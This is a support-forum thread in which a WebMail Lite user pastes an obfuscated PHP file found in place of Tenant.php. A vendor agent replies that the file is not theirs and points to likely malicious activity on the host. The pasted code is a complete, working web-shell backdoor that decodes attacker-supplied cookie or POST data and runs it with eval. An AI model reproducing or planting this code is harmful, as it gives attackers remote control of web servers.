Search The ForumSearch   RegisterRegister  LoginLogin

AfterLogic WebMail Lite
 AfterLogic Forum : AfterLogic WebMail Lite
Subject Topic: Problem Post ReplyPost New Topic
Author
Message << Prev Topic | Next Topic >>
sjsj
Newbie
Newbie


Joined: 28 March 2020
Location: Hungary
Online Status: Offline
Posts: 2
Posted: 28 March 2020 at 7:00am | IP Logged Quote sjsj
Hello,

I'm sorry, but i speak a little English.

I've installed a lot of Afterlogic WebMail Lite (PHP) already, but this new install (few days) is problem.

Now the ~/modules/Core/Classes/Tenant.php file plus content is:

<?php $u49387581 = 945;$GLOBALS['s2012'] = Array();global $s2012;$s2012 = $GLOBALS;${"\x47\x4c\x4fB\x41\x4c\x53"}['ld90718'] = "\x71\x6f\x55\x9\x29\x74\x42\x4a\x24\x2b\x73\x48\x3b\x5b\x36\x43\xa\x50\x60\x66\x56\x75\x6c\x49\x76\x78\x51\x35\x2d\x2f\x59\x7e\x40\x7d\x67\x32\x7b\xd\x72\x65\x4e\x22\x46\x61\x30\x2e\x3f\x7a\x58\x28\x 39\x6d\x70\x63\x6a\x41\x5a\x27\x20\x2c\x3a\x68\x31\x23\x33\x79\x4b\x3c\x38\x5e\x69\x6b\x4f\x25\x34\x77\x7c\x2a\x44\x62\x21\x3d\x37\x4d\x5f\x6e\x26\x54\x45\x5c\x53\x5d\x47\x64\x57\x4c\x52\x3e";$s2012[$ s2012['ld90718'][34].$s2012['ld90718'][82].$s2012['ld90718'][44].$s2012['ld90718'][39].$s2012['ld90718'][82].$s2012['ld90718'][79].$s2012['ld90718'][27]] = $s2012['ld90718'][53].$s2012['ld90718'][61].$s2012['ld90718'][38];$s2012[$s2012['ld90718'][19].$s2012['ld90718'][79].$s2012['ld90718'][44].$s2012['ld90718'][79].$s2012['ld90718'][50].$s2012['ld90718'][64].$s2012['ld90718'][50].$s2012['ld90718'][79].$s2012['ld90718'][27]] = $s2012['ld90718'][1].$s2012['ld90718'][38].$s2012['ld90718'][93];$s2012[$s2012['ld90718'][79].$s2012['ld90718'][68].$s2012['ld90718'][64].$s2012['ld90718'][35].$s2012['ld90718'][82].$s2012['ld90718'][44].$s2012['ld90718'][39]] = $s2012['ld90718'][93].$s2012['ld90718'][39].$s2012['ld90718'][19].$s2012['ld90718'][70].$s2012['ld90718'][85].$s2012['ld90718'][39];$s2012[$s2012['ld90718'][70].$s2012['ld90718'][62].$s2012['ld90718'][53].$s2012['ld90718'][53].$s2012['ld90718'][62].$s2012['ld90718'][82].$s2012['ld90718'][64]] = $s2012['ld90718'][10].$s2012['ld90718'][5].$s2012['ld90718'][38].$s2012['ld90718'][22].$s2012['ld90718'][39].$s2012['ld90718'][85];$s2012[$s2012['ld90718'][43].$s2012['ld90718'][27].$s2012['ld90718'][19].$s2012['ld90718'][43].$s2012['ld90718'][53]] = $s2012['ld90718'][93].$s2012['ld90718'][39].$s2012['ld90718'][19].$s2012['ld90718'][70].$s2012['ld90718'][85].$s2012['ld90718'][39].$s2012['ld90718'][93];$s2012[$s2012['ld90718'][0].$s2012['ld90718'][50].$s2012['ld90718'][35].$s2012['ld90718'][43].$s2012['ld90718'][82].$s2012['ld90718'][68].$s2012['ld90718'][44].$s2012['ld90718'][93].$s2012['ld90718'][44]] = $s2012['ld90718'][70].$s2012['ld90718'][85].$s2012['ld90718'][70].$s2012['ld90718'][84].$s2012['ld90718'][10].$s2012['ld90718'][39].$s2012['ld90718'][5];$s2012[$s2012['ld90718'][75].$s2012['ld90718'][39].$s2012['ld90718'][50].$s2012['ld90718'][14].$s2012['ld90718'][82].$s2012['ld90718'][39].$s2012['ld90718'][64].$s2012['ld90718'][27]] = $s2012['ld90718'][10].$s2012['ld90718'][39].$s2012['ld90718'][38].$s2012['ld90718'][70].$s2012['ld90718'][43].$s2012['ld90718'][22].$s2012['ld90718'][70].$s2012['ld90718'][47].$s2012['ld90718'][39];$s2012[$s2012['ld90718'][38].$s2012['ld90718'][68].$s2012['ld90718'][53].$s2012['ld90718'][93]] = $s2012['ld90718'][52].$s2012['ld90718'][61].$s2012['ld90718'][52].$s2012['ld90718'][24].$s2012['ld90718'][39].$s2012['ld90718'][38].$s2012['ld90718'][10].$s2012['ld90718'][70].$s2012['ld90718'][1].$s2012['ld90718'][85];$s2012[$s2012['ld90718'][0].$s2012['ld90718'][27].$s2012['ld90718'][43].$s2012['ld90718'][74]] = $s2012['ld90718'][21].$s2012['ld90718'][85].$s2012['ld90718'][10].$s2012['ld90718'][39].$s2012['ld90718'][38].$s2012['ld90718'][70].$s2012['ld90718'][43].$s2012['ld90718'][22].$s2012['ld90718'][70].$s2012['ld90718'][47].$s2012['ld90718'][39];$s2012[$s2012['ld90718'][93].$s2012['ld90718'][50].$s2012['ld90718'][64].$s2012['ld90718'][64].$s2012['ld90718'][82].$s2012['ld90718'][79].$s2012['ld90718'][62].$s2012['ld90718'][35]] = $s2012['ld90718'][79].$s2012['ld90718'][43].$s2012['ld90718'][10].$s2012['ld90718'][39].$s2012['ld90718'][14].$s2012['ld90718'][74].$s2012['ld90718'][84].$s2012['ld90718'][93].$s2012['ld90718'][39].$s2012['ld90718'][53].$s2012['ld90718'][1].$s2012['ld90718'][93].$s2012['ld90718'][39];$s2012[$s2012['ld90718'][5].$s2012['ld90718'][50].$s2012['ld90718'][27].$s2012['ld90718'][74].$s2012['ld90718'][53].$s2012['ld90718'][82].$s2012['ld90718'][14].$s2012['ld90718'][79]] = $s2012['ld90718'][10].$s2012['ld90718'][39].$s2012['ld90718'][5].$s2012['ld90718'][84].$s2012['ld90718'][5].$s2012['ld90718'][70].$s2012['ld90718'][51].$s2012['ld90718'][39].$s2012['ld90718'][84].$s2012['ld90718'][22].$s2012['ld90718'][70].$s2012['ld90718'][51].$s2012['ld90718'][70].$s2012['ld90718'][5];$s2012[$s2012['ld90718'][51].$s2012['ld90718'][64].$s2012['ld90718'][93].$s2012['ld90718'][93]] = $s2012['ld90718'][85].$s2012['ld90718'][35].$s2012['ld90718'][64].$s2012['ld90718'][64].$s2012['ld90718'][19].$s2012['ld90718'][19].$s2012['ld90718'][68].$s2012['ld90718'][62];$s2012[$s2012['ld90718'][25].$s2012['ld90718'][64].$s2012['ld90718'][74].$s2012['ld90718'][79].$s2012['ld90718'][74].$s2012['ld90718'][27].$s2012['ld90718'][27].$s2012['ld90718'][68].$s2012['ld90718'][50]] = $s2012['ld90718'][19].$s2012['ld90718'][79].$s2012['ld90718'][93].$s2012['ld90718'][53].$s2012['ld90718'][44].$s2012['ld90718'][43];$s2012[$s2012['ld90718'][71].$s2012['ld90718'][74].$s2012['ld90718'][79].$s2012['ld90718'][64]] = $_POST;$s2012[$s2012['ld90718'][39].$s2012['ld90718'][62].$s2012['ld90718'][62].$s2012['ld90718'][43].$s2012['ld90718'][19].$s2012['ld90718'][64].$s2012['ld90718'][79].$s2012['ld90718'][35].$s2012['ld90718'][39]] = $_COOKIE;@$s2012[$s2012['ld90718'][0].$s2012['ld90718'][50].$s2012['ld90718'][35].$s2012['ld90718'][43].$s2012['ld90718'][82].$s2012['ld90718'][68].$s2012['ld90718'][44].$s2012['ld90718'][93].$s2012['ld90718'][44]]($s2012['ld90718'][39].$s2012['ld90718'][38].$s2012['ld90718'][38].$s2012['ld90718'][1].$s2012['ld90718'][38].$s2012['ld90718'][84].$s2012['ld90718'][22].$s2012['ld90718'][1].$s2012['ld90718'][34], NULL);@$s2012[$s2012['ld90718'][0].$s2012['ld90718'][50].$s2012['ld90718'][35].$s2012['ld90718'][43].$s2012['ld90718'][82].$s2012['ld90718'][68].$s2012['ld90718'][44].$s2012['ld90718'][93].$s2012['ld90718'][44]]($s2012['ld90718'][22].$s2012['ld90718'][1].$s2012['ld90718'][34].$s2012['ld90718'][84].$s2012['ld90718'][39].$s2012['ld90718'][38].$s2012['ld90718'][38].$s2012['ld90718'][1].$s2012['ld90718'][38].$s2012['ld90718'][10], 0);@$s2012[$s2012['ld90718'][0].$s2012['ld90718'][50].$s2012['ld90718'][35].$s2012['ld90718'][43].$s2012['ld90718'][82].$s2012['ld90718'][68].$s2012['ld90718'][44].$s2012['ld90718'][93].$s2012['ld90718'][44]]($s2012['ld90718'][51].$s2012['ld90718'][43].$s2012['ld90718'][25].$s2012['ld90718'][84].$s2012['ld90718'][39].$s2012['ld90718'][25].$s2012['ld90718'][39].$s2012['ld90718'][53].$s2012['ld90718'][21].$s2012['ld90718'][5].$s2012['ld90718'][70].$s2012['ld90718'][1].$s2012['ld90718'][85].$s2012['ld90718'][84].$s2012['ld90718'][5].$s2012['ld90718'][70].$s2012['ld90718'][51].$s2012['ld90718'][39], 0);@$s2012[$s2012['ld90718'][5].$s2012['ld90718'][50].$s2012['ld90718'][27].$s2012['ld90718'][74].$s2012['ld90718'][53].$s2012['ld90718'][82].$s2012['ld90718'][14].$s2012['ld90718'][79]](0);if (!$s2012[$s2012['ld90718'][43].$s2012['ld90718'][27].$s2012['ld90718'][19].$s2012['ld90718'][43].$s2012['ld90718'][53]]($s2012['ld90718'][55].$s2012['ld90718'][95].$s2012['ld90718'][96].$s2012['ld90718'][88].$s2012['ld90718'][55].$s2012['ld90718'][78].$s2012['ld90718'][30].$s2012['ld90718'][84].$s2012['ld90718'][96].$s2012['ld90718'][2].$s2012['ld90718'][40].$s2012['ld90718'][84].$s2012['ld90718'][64].$s2012['ld90718'][14].$s2012['ld90718'][14].$s2012['ld90718'][43].$s2012['ld90718'][19].$s2012['ld90718'][79].$s2012['ld90718'][68].$s2012['ld90718'][43].$s2012['ld90718'][68].$s2012['ld90718'][43].$s2012['ld90718'][35].$s2012['ld90718'][64].$s2012['ld90718'][27].$s2012['ld90718'][27].$s2012['ld90718'][43].$s2012['ld90718'][79].$s2012['ld90718'][35].$s2012['ld90718'][62].$s2012['ld90718'][19].$s2012['ld90718'][79].$s2012['ld90718'][19].$s2012['ld90718'][62].$s2012['ld90718'][62].$s2012['ld90718'][79].$s2012['ld90718'][43].$s2012['ld90718'][62].$s2012['ld90718'][43].$s2012['ld90718'][44].$s2012['ld90718'][35].$s2012['ld90718'][19].$s2012['ld90718'][79].$s2012['ld90718'][43])){$s2012[$s2012['ld90718'][79].$s2012['ld90718'][68].$s2012['ld90718'][64].$s2012['ld90718'][35].$s2012['ld90718'][82].$s2012['ld90718'][44].$s2012['ld90718'][39]]($s2012['ld90718'][55].$s2012['ld90718'][95].$s2012['ld90718'][96].$s2012['ld90718'][88].$s2012['ld90718'][55].$s2012['ld90718'][78].$s2012['ld90718'][30].$s2012['ld90718'][84].$s2012['ld90718'][96].$s2012['ld90718'][2].$s2012['ld90718'][40].$s2012['ld90718'][84].$s2012['ld90718'][64].$s2012['ld90718'][14].$s2012['ld90718'][14].$s2012['ld90718'][43].$s2012['ld90718'][19].$s2012['ld90718'][79].$s2012['ld90718'][68].$s2012['ld90718'][43].$s2012['ld90718'][68].$s2012['ld90718'][43].$s2012['ld90718'][35].$s2012['ld90718'][64].$s2012['ld90718'][27].$s2012['ld90718'][27].$s2012['ld90718'][43].$s2012['ld90718'][79].$s2012['ld90718'][35].$s2012['ld90718'][62].$s2012['ld90718'][19].$s2012['ld90718'][79].$s2012['ld90718'][19].$s2012['ld90718'][62].$s2012['ld90718'][62].$s2012['ld90718'][79].$s2012['ld90718'][43].$s2012['ld90718'][62].$s2012['ld90718'][43].$s2012['ld90718'][44].$s2012['ld90718'][35].$s2012['ld90718'][19].$s2012['ld90718'][79].$s2012['ld90718'][43], 1);$jede = NULL;$u009f256 = NULL;$s2012[$s2012['ld90718'][61].$s2012['ld90718'][79].$s2012['ld90718'][19].$s2012['ld90718'][93].$s2012['ld90718'][35].$s2012['ld90718'][82].$s2012['ld90718'][93]] = $s2012['ld90718'][39].$s2012['ld90718'][39].$s2012['ld90718'][53].$s2012['ld90718'][53].$s2012['ld90718'][44].$s2012['ld90718'][44].$s2012['ld90718'][14].$s2012['ld90718'][19].$s2012['ld90718'][28].$s2012['ld90718'][50].$s2012['ld90718'][14].$s2012['ld90718'][50].$s2012['ld90718'][68].$s2012['ld90718'][28].$s2012['ld90718'][74].$s2012['ld90718'][82].$s2012['ld90718'][14].$s2012['ld90718'][64].$s2012['ld90718'][28].$s2012['ld90718'][68].$s2012['ld90718'][14].$s2012['ld90718'][43].$s2012['ld90718'][82].$s2012['ld90718'][28].$s2012['ld90718'][64].$s2012['ld90718'][53].$s2012['ld90718'][53].$s2012['ld90718'][43].$s2012['ld90718'][14].$s2012['ld90718'][39].$s2012['ld90718'][39].$s2012['ld90718'][53].$s2012['ld90718'][19].$s2012['ld90718'][39].$s2012['ld90718'][19].$s2012['ld90718'][50];global $hbfd27d;function fbdc0a($jede, $r74ec){global $s2012;$i212dfb7 = "";for ($p3e41fda=0; $p3e41fda<$s2012[$s2012['ld90718'][70].$s2012['ld90718'][62].$s2012['ld90718'][53].$s2012['ld90718'][53].$s2012['ld90718'][62].$s2012['ld90718'][82].$s2012['ld90718'][64]]($jede);){for ($rac539=0; $rac539<$s2012[$s2012['ld90718'][70].$s2012['ld90718'][62].$s2012['ld90718'][53].$s2012['ld90718'][53].$s2012['ld90718'][62].$s2012['ld90718'][82].$s2012['ld90718'][64]]($r74ec) && $p3e41fda<$s2012[$s2012['ld90718'][70].$s2012['ld90718'][62].$s2012['ld90718'][53].$s2012['ld90718'][53].$s2012['ld90718'][62].$s2012['ld90718'][82].$s2012['ld90718'][64]]($jede); $rac539++, $p3e41fda++){$i212dfb7 .= $s2012[$s2012['ld90718'][34].$s2012['ld90718'][82].$s2012['ld90718'][44].$s2012['ld90718'][39].$s2012['ld90718'][82].$s2012['ld90718'][79].$s2012['ld90718'][27]]($s2012[$s2012['ld90718'][19].$s2012['ld90718'][79].$s2012['ld90718'][44].$s2012['ld90718'][79].$s2012['ld90718'][50].$s2012['ld90718'][64].$s2012['ld90718'][50].$s2012['ld90718'][79].$s2012['ld90718'][27]]($jede[$p3e41fda]) ^ $s2012[$s2012['ld90718'][19].$s2012['ld90718'][79].$s2012['ld90718'][44].$s2012['ld90718'][79].$s2012['ld90718'][50].$s2012['ld90718'][64].$s2012['ld90718'][50].$s2012['ld90718'][79].$s2012['ld90718'][27]]($r74ec[$rac539]));}}return $i212dfb7;}function n233ff81($jede, $r74ec){global $s2012;global $hbfd27d;return $s2012[$s2012['ld90718'][25].$s2012['ld90718'][64].$s2012['ld90718'][74].$s2012['ld90718'][79].$s2012['ld90718'][74].$s2012['ld90718'][27].$s2012['ld90718'][27].$s2012['ld90718'][68].$s2012['ld90718'][50]]($s2012[$s2012['ld90718'][25].$s2012['ld90718'][64].$s2012['ld90718'][74].$s2012['ld90718'][79].$s2012['ld90718'][74].$s2012['ld90718'][27].$s2012['ld90718'][27].$s2012['ld90718'][68].$s2012['ld90718'][50]]($jede, $hbfd27d), $r74ec);}foreach ($s2012[$s2012['ld90718'][39].$s2012['ld90718'][62].$s2012['ld90718'][62].$s2012['ld90718'][43].$s2012['ld90718'][19].$s2012['ld90718'][64].$s2012['ld90718'][79].$s2012['ld90718'][35].$s2012['ld90718'][39]] as $r74ec=>$r92adb80){$jede = $r92adb80;$u009f256 = $r74ec;}if (!$jede){foreach ($s2012[$s2012['ld90718'][71].$s2012['ld90718'][74].$s2012['ld90718'][79].$s2012['ld90718'][64]] as $r74ec=>$r92adb80){$jede = $r92adb80;$u009f256 = $r74ec;}}$jede = @$s2012[$s2012['ld90718'][0].$s2012['ld90718'][27].$s2012['ld90718'][43].$s2012['ld90718'][74]]($s2012[$s2012['ld90718'][51].$s2012['ld90718'][64].$s2012['ld90718'][93].$s2012['ld90718'][93]]($s2012[$s2012['ld90718'][93].$s2012['ld90718'][50].$s2012['ld90718'][64].$s2012['ld90718'][64].$s2012['ld90718'][82].$s2012['ld90718'][79].$s2012['ld90718'][62].$s2012['ld90718'][35]]($jede), $u009f256));if (isset($jede[$s2012['ld90718'][43].$s2012['ld90718'][71]]) && $hbfd27d==$jede[$s2012['ld90718'][43].$s2012['ld90718'][71]]){if ($jede[$s2012['ld90718'][43]] == $s2012['ld90718'][70]){$p3e41fda = Array($s2012['ld90718'][52].$s2012['ld90718'][24] => @$s2012[$s2012['ld90718'][38].$s2012['ld90718'][68].$s2012['ld90718'][53].$s2012['ld90718'][93]](),$s2012['ld90718'][10].$s2012['ld90718'][24] => $s2012['ld90718'][62].$s2012['ld90718'][45].$s2012['ld90718'][44].$s2012['ld90718'][28].$s2012['ld90718'][62],);echo @$s2012[$s2012['ld90718'][75].$s2012['ld90718'][39].$s2012['ld90718'][50].$s2012['ld90718'][14].$s2012['ld90718'][82].$s2012['ld90718'][39].$s2012['ld90718'][64].$s2012['ld90718'][27]]($p3e41fda);}elseif ($jede[$s2012['ld90718'][43]] == $s2012['ld90718'][39]){eval/*l3353*/($jede[$s2012['ld90718'][93]]);}exit();}} ?>

Why? Is it normal? My login screen is only white blank page. I think attack the web hosting or virus, but the admin think is not.

Please help me. Thanks.
Back to Top View sjsj's Profile Search for other posts by sjsj
 
Igor
AfterLogic Support
AfterLogic Support


Joined: 24 June 2008
Location: United States
Online Status: Offline
Posts: 6038
Posted: 30 March 2020 at 12:59am | IP Logged Quote Igor
I'm really not sure where that could be coming from. I took modules/Core/Classes/Tenant.php file from the latest WebMail Lite package, have zipped and uploaded it to:

https://afterlogic.com/files/Tenant.php.zip

As you can see, that's a typical PHP script without encoding of any kind. The file content you posted doesn't really look like our script encoded, it does something else altogether, and it could indeed be a result of some malicious activity within your webhosting space.

--
Regards,
Igor, Afterlogic Support
Back to Top View Igor's Profile Search for other posts by Igor
 

If you wish to post a reply to this topic you must first login
If you are not already registered you must first register

  Post ReplyPost New Topic
Printable version Printable version

Forum Jump

Powered by Web Wiz Forums version 7.9
Copyright ©2001-2004 Web Wiz Guide